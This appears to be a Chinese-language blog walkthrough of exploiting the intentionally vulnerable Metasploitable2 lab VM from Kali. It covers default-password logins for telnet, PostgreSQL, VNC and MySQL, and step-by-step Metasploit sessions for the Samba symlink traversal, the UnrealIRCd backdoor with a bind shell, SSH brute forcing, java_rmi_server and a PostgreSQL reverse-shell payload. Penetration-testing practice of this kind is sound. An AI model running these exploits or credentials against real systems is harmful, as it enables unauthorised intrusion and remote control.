• Metasploitable2 靶机漏洞


    演示环境

    1、靶机: Metasploitable2-Linux

         IP:192.168.184.130

    2、攻击机:Kali-Linux-2021.02-amd64

         IP:192.168.184.128

    扫描端口

    系统弱密码登录

    1、在kali上执行命令行telnet 192.168.184.130

    2、Login和password都输入msfadmin

    3、登录成功,进入系统

    4、测试如下:

    PostgreSQL弱密码登录

    1、在Kali上执行psql -h 192.168.184.130 –U postgres

    2、输入密码:postgres

    3、登录成功,进入postgresql系统

    VNC弱密码登录

    1、在kali图形界面的终端中执行vncviewer 192.168.184.130

    2、输入密码 password

    3、登录成功,进入系统

    MySQL弱密码登录

    1、在kali上执行mysql –h 192.168.184.130 –u root

    2、登录成功,进入MySQL系统

    Samba sysmlink 默认配置目录遍历漏洞

    CVE-2010-0926

    端口: 445
    利用模块:

    auxiliary/admin/smb/samba_symlink_traversal
    set SMBSHARE tmp //设置SAM可写文件

     

    UnrealIRCd Backdoor(ircd)

    端口: 6667
    利用模块: exploit/unix/irc/unreal_ircd_3281_backdoor

     msf6 > use exploit/unix/irc/unreal_ircd_3281_backdoor 调试模块
    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set 查看设置信息
    
    
    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 192.168.184.130
    rhosts => 192.168.184.130 设置攻击目标IP地址
    
    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run 执行
    
    [-] 192.168.184.130:6667 - Exploit failed: A payload has not been selected.
    发现没有配置默认的payload
    [*] Exploit completed, but no session was created.

    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads 查看可以使用的payload
    
    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/bind_perl
    payload => cmd/unix/bind_perl
    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

     

    ssh用户名密码扫描

    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > search ssh_login 查找模块
    
    msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > use auxiliary/scanner/ssh/ssh_login
    msf6 auxiliary(scanner/ssh/ssh_login) > set
    
    msf6 auxiliary(scanner/ssh/ssh_login) > set username root 设置暴力破解的用户名
    username => root
    msf6 auxiliary(scanner/ssh/ssh_login) > set userpass_file /usr/share/wordlists/metasploit/root_userpass.txt 设置暴力破解文件
    userpass => file /usr/share/worilsts/metasploit/root_userpass.txt
    msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.184.130 设置攻击目标的IP地址
    rhosts => 192.168.184.130

     

    msf6 auxiliary(scanner/ssh/ssh_login) > run 执行,得出的密码是root

     利用服务器不安全默认配置java代码

    msf6 auxiliary(scanner/ssh/ssh_login) > search java_rmi_server 查询模块
    msf6 exploit(multi/misc/java_rmi_server) > set rhosts 192.168.184.130 设置执行目标IP地址
    rhosts => 192.168.184.130
    msf6 exploit(multi/misc/java_rmi_server) > exploit 执行

     

      

      

    Postgres共享库代码任意执行

    在一些默认的Linux安装的PostgreSQL,postgres服务账户可以写到/tmp目录,还有共享库,允许任意执行代码

    msf6 exploit(multi/misc/java_rmi_server) > search PostgreSQL 查找相应的模块
    
    msf6 exploit(multi/misc/java_rmi_server) > use exploit/linux/postgres/postgres_payload 调用模块
    [*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
    msf6 exploit(linux/postgres/postgres_payload) > set 查看设置
    
    msf6 exploit(linux/postgres/postgres_payload) > set rhosts 192.168.184.130 设置攻击目标IP地址
    rhosts => 192.168.184.130
    msf6 exploit(linux/postgres/postgres_payload) > run 执行

     

    作者:拾瑾
    个性签名:愿历经千帆,归来仍少年.
    本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文连接,否则保留追究法律责任的权利.
  • 相关阅读:
    记录@DeleteMapping注解的使用
    记录一次linux设置frp开机自启动功能实现
    mongo对用户简单操作
    Jedis分布式锁实际应用笔记
    如何在R语言中建立六边形矩阵热图heatmap可视化
    R语言复杂网络分析:聚类(社区检测)和可视化
    R语言泊松Poisson回归模型预测人口死亡率和期望寿命
    R语言混合正态分布极大似然估计和EM算法
    R语言使用自组织映射神经网络(SOM)进行客户细分
    R语言时间序列TAR阈值自回归模型
  • 原文地址:https://www.cnblogs.com/ayoung/p/15186328.html
Copyright © 2020-2023  润新知